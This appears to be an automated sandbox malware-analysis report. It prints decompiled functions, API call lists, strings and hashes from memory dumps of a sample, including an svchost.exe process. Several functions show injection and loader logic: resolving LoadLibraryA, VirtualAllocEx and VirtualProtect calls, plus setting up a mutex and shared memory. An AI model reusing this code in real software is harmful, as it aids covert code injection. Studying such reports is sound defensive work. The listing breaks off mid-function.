VirtualProtect.KERNEL32(?,00000004,00000040,00000000,00AB5498,00000018,00AB3A22,?,?,00AB3F2D,00000002,?,00AB3B38,?,00000000,00000000), ref: 00AB3ABC
VirtualProtect.KERNEL32(?,00000004,00000000,00000000,?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AE1
GetLastError.KERNEL32(?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AE9

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 2b542fb69e9b2bf4769b48f0971daf688429c48db960eb26e3bd51be998ae4a2
Instruction ID: 08050505628e6808722e814cbaf11fcc74e5f653f0d4663ec733fa0de34078f8
Opcode Fuzzy Hash: 2b542fb69e9b2bf4769b48f0971daf688429c48db960eb26e3bd51be998ae4a2
Instruction Fuzzy Hash: 7F214D71D4060AAFDB209FB5CC49BADBB78BB04751F108215F611A6192D735EA12DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3309, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00AB3309(void* __ecx, signed int __edx, intOrPtr* _a4, CHAR* _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t18;
				CHAR* _t19;
				signed int _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t23;

				_t20 = __edx;
				_t18 = __ecx;
				_t21 = 8;
				_t23 = E00AB1490(0x318);
				_t27 = _t23;
				if(_t23 != 0) {
					memset(_t23, 0, 0x318);
					_t22 = _a4;
					_push("LoadLibraryA");
					_push("KERNEL32.DLL");
					_push( *_t22);
					_t11 = E00AB2A4E(0x318, _t18, _t22, _t23, _t27);
					 *(_t23 + 8) = _t11;
					 *(_t23 + 0xc) = _t20;
					if((_t11 | _t20) == 0) {
						_t21 = 2;
					} else {
						_t5 = _t23 + 0x18; // 0x18
						_t19 = _t5;
						asm("cdq");
						 *(_t23 + 0x10) = _t19;
						 *(_t23 + 0x14) = _t20;
						lstrcpyA(_t19, _a8);
						_push(0);
						_push(_t23);
						_push(_t22);
						_t21 = E00AB3383(_t19, _t20);
					}
					LocalFree(_t23);
				}
				return _t21;
			}

0x00ab3309
0x00ab3309
0x00ab3311
0x00ab331d
0x00ab331f
0x00ab3321
0x00ab3327
0x00ab332c
0x00ab332f
0x00ab3334
0x00ab3339
0x00ab333b
0x00ab3343
0x00ab3348
0x00ab334b
0x00ab3375
0x00ab334d
0x00ab3350
0x00ab3350
0x00ab3355
0x00ab3357
0x00ab335a
0x00ab335d
0x00ab3363
0x00ab3365
0x00ab3366
0x00ab336f
0x00ab336f
0x00ab3377
0x00ab3377
0x00ab3382

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

memset.NTDLL ref: 00AB3327

Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27

lstrcpyA.KERNEL32(00000018,00AB2344,?,?,?,00AB2344,?,?), ref: 00AB335D

Part of subcall function 00AB3383: memset.NTDLL ref: 00AB33AF
Part of subcall function 00AB3383: memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
Part of subcall function 00AB3383: VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4

LocalFree.KERNEL32(00000000,?,?,?,00AB2344,?,?), ref: 00AB3377

Strings

KERNEL32.DLL, xrefs: 00AB3334
LoadLibraryA, xrefs: 00AB332F

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocVirtual$FreeLocalmemset$lstrcpymemcpy
String ID: KERNEL32.DLL$LoadLibraryA
API String ID: 1924211247-1423781741
Opcode ID: 75c1cef331c936f9c15f86d096ba79363f77d0b5e6d5fa07300e0fe238f11675
Instruction ID: 5cb2e94233addc140b422155b9343e9fc0d0b4d7dd7cd632a6273ce299c7761e
Opcode Fuzzy Hash: 75c1cef331c936f9c15f86d096ba79363f77d0b5e6d5fa07300e0fe238f11675
Instruction Fuzzy Hash: F701DB72A41B147BC7306B359C01FDB7BECEF847A4F04452AF5059A253DA74EA0147E4

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3E8E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00AB3E8E(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _v12;
				void* __ecx;
				struct HINSTANCE__* _t19;
				intOrPtr _t30;
				struct HINSTANCE__* _t33;
				void* _t35;
				intOrPtr _t38;
				void* _t39;
				void* _t41;
				signed int _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t52;

				_t39 = __edx;
				_push(_t35);
				_push(_t35);
				_t19 = GetModuleHandleW(L"ADVAPI32.DLL");
				_t44 = 0;
				_t33 = _t19;
				_t41 = E00AB3F38(_a12, _a16, 0);
				_t47 = _t46 + 0xc;
				if(_t41 == 0) {
					_v12 = 0;
					_v8 = 0;
					_t41 = E00AB2D34(_t35, GetCurrentProcess(),  &_v12,  &_v8);
					_t48 = _t47 + 0xc;
					if(_t41 != 0) {
						E00AB3B16(_a12, _a16);
					} else {
						_t38 = _v8;
						if(_t38 != 0) {
							do {
								_t30 =  *((intOrPtr*)(_v12 + _t44 * 4));
								_t52 = _t30 -  *0xb16d4c; // 0xab0000
								if(_t52 != 0 && _t30 != _t33) {
									E00AB3F38(_a4, _a8, _t30);
									_t38 = _v8;
									_t48 = _t48 + 0xc;
								}
								_t44 = _t44 + 1;
							} while (_t44 < _t38);
						}
						LocalFree(_v12);
						E00AB3FC3(_t39, _a4, _a8);
					}
				}
				return _t41;
			}

0x00ab3e8e
0x00ab3e91
0x00ab3e92
0x00ab3e9b
0x00ab3ea1
0x00ab3ea3
0x00ab3eb1
0x00ab3eb3
0x00ab3eb8
0x00ab3ebd
0x00ab3ec4
0x00ab3ed4
0x00ab3ed6
0x00ab3edb
0x00ab3f28
0x00ab3edd
0x00ab3edd
0x00ab3ee2
0x00ab3ee4
0x00ab3ee7
0x00ab3eea
0x00ab3ef0
0x00ab3efd
0x00ab3f02
0x00ab3f05
0x00ab3f05
0x00ab3f08
0x00ab3f09
0x00ab3ee4
0x00ab3f10
0x00ab3f1b
0x00ab3f1b
0x00ab3f2e
0x00ab3f37

APIs

GetModuleHandleW.KERNEL32(ADVAPI32.DLL,00000000,00000000,?,00B16948,00B16948,?,00AB1B07,00B16948,00000004,00B169A8,00000004), ref: 00AB3E9B

Part of subcall function 00AB3F38: GetModuleHandleA.KERNEL32(00000002,00000000,00000000,00000000,?,00AB3EB1,00B16948,00AB1B07,00000000,?,00B16948,00B16948,?,00AB1B07,00B16948,00000004), ref: 00AB3F60

GetCurrentProcess.KERNEL32(00B169A8,00000004,00000004,00B169A8,00000004), ref: 00AB3EC8

Part of subcall function 00AB2D34: EnumProcessModules.PSAPI(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D5F
Part of subcall function 00AB2D34: LocalFree.KERNEL32(00000000,?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D73

LocalFree.KERNEL32(?), ref: 00AB3F10

Strings

ADVAPI32.DLL, xrefs: 00AB3E96

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHandleLocalModuleProcess$CurrentEnumModules
String ID: ADVAPI32.DLL
API String ID: 1860380997-33758204
Opcode ID: 983be7ea1d6367c69392dcf2448108a393fa1d3d816cbb450d5f806f17440a53
Instruction ID: d8ba9322877ef5200a147812a2d155ce6e22b4e197c7c2a4cc9e74737a14a598
Opcode Fuzzy Hash: 983be7ea1d6367c69392dcf2448108a393fa1d3d816cbb450d5f806f17440a53
Instruction Fuzzy Hash: 41115B32E00208BBCF15AFA5DD45DEE7FBDEF44360B504066F9049A222DA319F559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB32D6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00AB32D6(intOrPtr _a4) {
				_Unknown_base(*)()* _t2;

				_t2 =  *0xb16d78;
				if(_t2 != 0) {
					L2:
					return  *_t2(_a4);
				}
				_t2 = GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "Wow64EnableWow64FsRedirection");
				 *0xb16d78 = _t2;
				if(_t2 != 0) {
					goto L2;
				}
				return _t2;
			}

0x00ab32d9
0x00ab32e0
0x00ab3302
0x00000000
0x00ab3305
0x00ab32f3
0x00ab32f9
0x00ab3300
0x00000000
0x00000000
0x00ab3308

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,Wow64EnableWow64FsRedirection,?,00AB1533,00000000), ref: 00AB32EC
GetProcAddress.KERNEL32(00000000), ref: 00AB32F3

Strings

KERNEL32.DLL, xrefs: 00AB32E7
Wow64EnableWow64FsRedirection, xrefs: 00AB32E2

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: KERNEL32.DLL$Wow64EnableWow64FsRedirection
API String ID: 1646373207-2529553039
Opcode ID: 14d375d96342fe6c5e6e3f6ddbde9409d3538ed873b6be29bbe95749b198cefd
Instruction ID: d0515aabce4c44c5eb2835b6dc248849c0c7902a8a9622882300ac79df557984
Opcode Fuzzy Hash: 14d375d96342fe6c5e6e3f6ddbde9409d3538ed873b6be29bbe95749b198cefd
Instruction Fuzzy Hash: F4D05E31A40B056F9F01ABF5EC46FD63FACBB407087404030F414D6123DE20D9018A91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2D34, Relevance: 6.1, APIs: 4, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00AB2D34(void* __ecx, intOrPtr _a4, void** _a8, unsigned int* _a12) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int* _t14;
				void* _t22;
				unsigned int _t25;
				long _t28;
				void* _t31;

				_v8 = _v8 & 0x00000000;
				_t28 = 8;
				_t22 = 0x1000;
				_t31 = E00AB1490(0x1000);
				if(_t31 == 0) {
					L10:
					return _t28;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t14 =  &_v8;
					_push(_t14);
					_push(_t22);
					_push(_t31);
					_push(_a4);
					L00AB45BC();
					_v12 = _t14;
					if(_t14 == 0) {
						break;
					}
					_t25 = _v8;
					if(_t22 > _t25) {
						L6:
						if(_t31 != 0) {
							if(_t14 == 0) {
								_t28 = GetLastError();
								LocalFree(_t31);
							} else {
								_t28 = 0;
								 *_a8 = _t31;
								 *_a12 = _t25 >> 2;
							}
						}
						goto L10;
					}
					LocalFree(_t31);
					_t22 = _t22 + 0x1000;
					_t31 = E00AB1490(_t22);
					if(_t31 != 0) {
						continue;
					} else {
						_t14 = _v12;
						break;
					}
				}
				_t25 = _v8;
				goto L6;
			}

0x00ab2d39
0x00ab2d47
0x00ab2d49
0x00ab2d50
0x00ab2d54
0x00ab2db7
0x00ab2dbf
0x00000000
0x00000000
0x00000000
0x00ab2d56
0x00ab2d56
0x00ab2d56
0x00ab2d59
0x00ab2d5a
0x00ab2d5b
0x00ab2d5c
0x00ab2d5f
0x00ab2d64
0x00ab2d69
0x00000000
0x00000000
0x00ab2d6b
0x00ab2d70
0x00ab2d90
0x00ab2d92
0x00ab2d96
0x00ab2db0
0x00ab2db2
0x00ab2d98
0x00ab2d9e
0x00ab2da0
0x00ab2da5
0x00ab2da5
0x00ab2d96
0x00000000
0x00ab2d92
0x00ab2d73
0x00ab2d78
0x00ab2d84
0x00ab2d88
0x00000000
0x00ab2d8a
0x00ab2d8a
0x00000000
0x00ab2d8a
0x00ab2d88
0x00ab2d8d
0x00000000

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

EnumProcessModules.PSAPI(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D5F
LocalFree.KERNEL32(00000000,?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D73
GetLastError.KERNEL32(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2DA9
LocalFree.KERNEL32(00000000), ref: 00AB2DB2

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Local$Free$AllocEnumErrorLastModulesProcess
String ID:
API String ID: 114004284-0
Opcode ID: f7dd6d21b111e350eb2e4b673854398d710e07ead776cd018dfb53c5d757657d
Instruction ID: a73ad3c021bd11f255436b759a345e01a3658574fe9b47a57bb707bdf4f1a04c
Opcode Fuzzy Hash: f7dd6d21b111e350eb2e4b673854398d710e07ead776cd018dfb53c5d757657d
Instruction Fuzzy Hash: 8411D6B2A11215ABE7219BA9CC55FEF77ACDF447A1F000166F804DB202EA74DD0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB29D6, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB29D6(void* __ecx, struct HINSTANCE__* _a4, void** _a8) {
				long _v8;
				long _t8;
				long _t15;
				long _t19;
				void* _t22;

				_t19 = 0;
				_t15 = 0x104;
				_t22 = E00AB1490(0x104);
				if(_t22 == 0) {
					L9:
					_t19 = 8;
					L10:
					return _t19;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t8 = GetModuleFileNameA(_a4, _t22, _t15);
					_v8 = _t8;
					if(_t8 == 0 || _t15 != _t8) {
						break;
					}
					_t15 = _t15 + 0x104;
					LocalFree(_t22);
					_t22 = E00AB1490(_t15);
					if(_t22 != 0) {
						continue;
					}
					_t8 = _v8;
					break;
				}
				if(_t22 == 0) {
					goto L9;
				}
				if(_t8 == 0) {
					_t19 = GetLastError();
					LocalFree(_t22);
				} else {
					 *_a8 = _t22;
				}
				goto L10;
			}

0x00ab29e2
0x00ab29e5
0x00ab29ec
0x00ab29f0
0x00ab2a42
0x00ab2a44
0x00ab2a45
0x00ab2a4d
0x00000000
0x00000000
0x00000000
0x00ab29f2
0x00ab29f2
0x00ab29f7
0x00ab29fd
0x00ab2a02
0x00000000
0x00000000
0x00ab2a09
0x00ab2a0f
0x00ab2a1a
0x00ab2a1e
0x00000000
0x00000000
0x00ab2a20
0x00000000
0x00ab2a20
0x00ab2a25
0x00000000
0x00000000
0x00ab2a29
0x00ab2a39
0x00ab2a3b
0x00ab2a2b
0x00ab2a2e
0x00ab2a2e
0x00000000

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB29F7
LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A0F
GetLastError.KERNEL32(?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A32
LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A3B

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Local$Free$AllocErrorFileLastModuleName
String ID:
API String ID: 1353466770-0
Opcode ID: 3593cc71782aeceb40c0a01b0289f84b604c85a9df0ed96a90117b710d9e0a30
Instruction ID: d76ef29947bd84b773edfdf5a7a33c9f659ae8938258ed55c7b972b3ee42a834
Opcode Fuzzy Hash: 3593cc71782aeceb40c0a01b0289f84b604c85a9df0ed96a90117b710d9e0a30
Instruction Fuzzy Hash: A401D172E012256BC731A7A99C54BEBBBDCEF557E0B450126BD04D7213E970CC0083E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2936, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB2936(void* __ecx) {
				intOrPtr _t1;
				void* _t3;
				void* _t4;

				_t4 = __ecx;
				_t1 =  *0xb16d84; // 0x0
				if(_t1 == 0) {
					_t1 = E00AB2DC0(_t3, _t4, GetModuleHandleW(L"KERNEL32.DLL"), "LoadLibraryA");
					if(_t1 != 0) {
						 *0xb16d84 = _t1;
						return _t1;
					}
				}
				return _t1;
			}

0x00ab2936
0x00ab2936
0x00ab293d
0x00ab2950
0x00ab2959
0x00ab295b
0x00000000
0x00ab295b
0x00ab2959
0x00ab2960

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,LoadLibraryA,00AB2E7B,00000000,?,00000000,?,00AB19FA,?,?,00000000), ref: 00AB2949

Part of subcall function 00AB2DC0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000008,?,00AB19FA,?,?,00000000), ref: 00AB2E16
Part of subcall function 00AB2DC0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E29
Part of subcall function 00AB2DC0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E40
Part of subcall function 00AB2DC0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00AB2E56
Part of subcall function 00AB2DC0: LocalFree.KERNEL32(?,00000008,?,00AB19FA,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E60

Strings

KERNEL32.DLL, xrefs: 00AB2944
LoadLibraryA, xrefs: 00AB293F

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Handle$CloseCreateFreeLocalModulePointerRead
String ID: KERNEL32.DLL$LoadLibraryA
API String ID: 1464854441-1423781741
Opcode ID: 0d8e672f142fd0e104f346c5dc3aefc0600affbc163e7b485cfa2471e5f08ed8
Instruction ID: 8d15e386904c987e89ddaad03a200c165ed05da41a17bf979752001ad1cbc47c
Opcode Fuzzy Hash: 0d8e672f142fd0e104f346c5dc3aefc0600affbc163e7b485cfa2471e5f08ed8
Instruction Fuzzy Hash: 1FD01275B427016A6F146B75FD49BC627DCB700715720043AF004E6193EE20D4005754

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 5200 Parent PID: 6296 svchost.exeCOMMON

Executed Functions

Function 00C788A0, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 223
filememorystringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 24%

			E00C788A0(DWORD* __rax, long long __rbx, DWORD** __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t51;
				long _t52;
				long _t94;
				signed long long _t97;
				DWORD* _t127;
				DWORD** _t129;
				DWORD* _t165;
				signed long long _t167;
				DWORD* _t169;
				void* _t171;
				void* _t172;
				void* _t174;
				DWORD* _t183;
				long _t184;
				void* _t186;
				DWORD* _t188;
				int _t189;
				void* _t191;

				_t127 = __rax;
				 *((long long*)(_t171 + 8)) = __rbx;
				 *((intOrPtr*)(_t171 + 0x20)) = r9d;
				 *((intOrPtr*)(_t171 + 0x18)) = r8d;
				_push(_t169);
				_push(_t167);
				_t172 = _t171 - 0x140;
				_t129 = __rdx;
				_t174 = _t172 + 0x40;
				 *(_t172 + 0x20) =  *(_t172 + 0x20) & _t165;
				r9d = 0x100;
				r15d = 0;
				r14d = 0;
				r12d = 0;
				_t7 =  &(_t169[0]); // 0x2
				_t94 = _t7;
				_t51 = GetUserObjectInformationA(_t191, _t189, _t186, _t184, _t165);
				_t99 = _t51;
				if(_t51 == 0) {
					L17:
					_t52 = GetLastError();
					_t94 = _t52;
					if(_t52 == 0) {
						L20:
						if(_t184 != 0) {
							HeapFree();
						}
						if(_t169 != 0) {
							HeapFree();
						}
						if(_t189 != 0) {
							HeapFree();
						}
						if(_t191 != 0) {
							HeapFree();
						}
						return _t94;
					}
					L18:
					E00C78C54(_t129);
					if(_t165 != 0) {
						HeapFree();
					}
					goto L20;
				}
				_t9 = _t191 + 1; // 0x1
				r13d = _t9;
				r9d = r13d;
				 *((intOrPtr*)(_t172 + 0x30)) =  *((intOrPtr*)(_t172 + 0x44));
				r8d = 0;
				E00C77E6C(_t99, __rdx, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t191 = _t127;
				_t100 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				r9d = r13d;
				r8d = 0;
				E00C77E6C(_t100, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t169 = _t127;
				_t101 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				r9d = r13d;
				r8d = 0;
				E00C77E6C(_t101, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t189 = _t127;
				_t102 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				r9d = r13d;
				r8d = 0;
				E00C77E6C(_t102, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t188 = _t127;
				_t103 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				_t15 = _t184 + 1; // 0x1
				r9d = _t15;
				r8d = 0;
				E00C77E6C(_t103, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t184 = _t127;
				_t104 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				_t17 =  &(_t165[0]); // 0x1
				r9d = _t17;
				r8d = 0;
				E00C77E6C(_t104, _t129, _t172 + 0x30, "Local\\", _t165, _t167, _t169, _t174);
				_t165 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				_t129[2] = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				_t183 = _t188;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				_t129[4] = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				CreateMutexA(); // executed
				 *_t129 = _t127;
				if(_t127 == 0) {
					goto L17;
				}
				r13d =  *((intOrPtr*)(_t172 + 0x198));
				if(r13d != 0 || GetLastError() == 0xb7) {
					r9d = 0;
					 *(_t172 + 0x28) = _t191;
					 *(_t172 + 0x20) = 0x298;
					_t26 =  &(_t183[1]); // 0x4
					r8d = _t26;
					CreateFileMappingA(??, ??, ??, ??, ??, ??);
					_t129[6] = _t127;
					if(_t127 == 0) {
						goto L17;
					}
					r9d = 0;
					 *(_t172 + 0x20) = _t167;
					r8d = 0;
					MapViewOfFile(??, ??, ??, ??, ??);
					_t129[8] = _t127;
					if(_t127 == 0) {
						goto L17;
					}
					if(r13d == 0) {
						OpenFileMappingA();
						_t129[0xe] = _t127;
						__eflags = _t127;
						if(_t127 == 0) {
							goto L17;
						}
						 *(_t172 + 0x20) =  *(_t172 + 0x20) & 0x00000000;
						r9d = 0;
						r8d = 0;
						MapViewOfFile(??, ??, ??, ??, ??);
						_t129[0x10] = _t127;
						__eflags = _t127;
						if(_t127 == 0) {
							goto L17;
						}
						_t97 =  *(_t172 + 0x190);
						L32:
						_t129[0x12] = _t97;
						_t94 = 0;
						_t129[0xc] = _t165;
						goto L20;
					}
					_t31 =  &(_t127[0x5c]); // 0x170
					E00C77DBC(_t172 + 0x30, _t31);
					lstrcpyA(??, ??);
					_t97 =  *(_t172 + 0x190);
					r9d = 0;
					 *(_t172 + 0x28) = _t165;
					 *(_t172 + 0x20) = _t97;
					_t38 =  &(_t183[1]); // 0x4
					r8d = _t38;
					CreateFileMappingA(??, ??, ??, ??, ??, ??);
					_t129[0xe] = _t127;
					if(_t127 == 0) {
						goto L17;
					}
					r9d = 0;
					 *(_t172 + 0x20) = _t167;
					r8d = 0;
					MapViewOfFile(??, ??, ??, ??, ??);
					_t129[0x10] = _t127;
					if(_t127 != 0) {
						goto L32;
					}
					goto L17;
				} else {
					goto L18;
				}
			}

0x00c788a0
0x00c788a0
0x00c788a5
0x00c788aa
0x00c788af
0x00c788b0
0x00c788ba
0x00c788c1
0x00c788c4
0x00c788cd
0x00c788d2
0x00c788d8
0x00c788db
0x00c788de
0x00c788e1
0x00c788e1
0x00c788e6
0x00c788ec
0x00c788ee
0x00c78b37
0x00c78b37
0x00c78b3d
0x00c78b41
0x00c78b62
0x00c78b65
0x00c78b73
0x00c78b73
0x00c78b7c
0x00c78b8a
0x00c78b8a
0x00c78b93
0x00c78ba1
0x00c78ba1
0x00c78baa
0x00c78bb8
0x00c78bb8
0x00c78bda
0x00c78bda
0x00c78b43
0x00c78b46
0x00c78b4e
0x00c78b5c
0x00c78b5c
0x00000000
0x00c78b4e
0x00c788f8
0x00c788f8
0x00c788fc
0x00c788ff
0x00c78903
0x00c78912
0x00c78917
0x00c7891a
0x00c7891d
0x00000000
0x00000000
0x00c78923
0x00c7892d
0x00c78935
0x00c7893a
0x00c7893d
0x00c78940
0x00000000
0x00000000
0x00c78946
0x00c78950
0x00c78958
0x00c7895d
0x00c78960
0x00c78963
0x00000000
0x00000000
0x00c78969
0x00c78973
0x00c7897b
0x00c78980
0x00c78983
0x00c78986
0x00000000
0x00000000
0x00c7898c
0x00c7898c
0x00c78991
0x00c789a0
0x00c789a5
0x00c789a8
0x00c789ab
0x00000000
0x00000000
0x00c789b1
0x00c789b1
0x00c789b5
0x00c789c4
0x00c789c9
0x00c789cf
0x00000000
0x00000000
0x00c789db
0x00c789e5
0x00c789eb
0x00c789f2
0x00000000
0x00000000
0x00c789f8
0x00c789fe
0x00c78a08
0x00c78a0e
0x00c78a15
0x00000000
0x00000000
0x00c78a27
0x00c78a2d
0x00c78a33
0x00000000
0x00000000
0x00c78a39
0x00c78a44
0x00c78a57
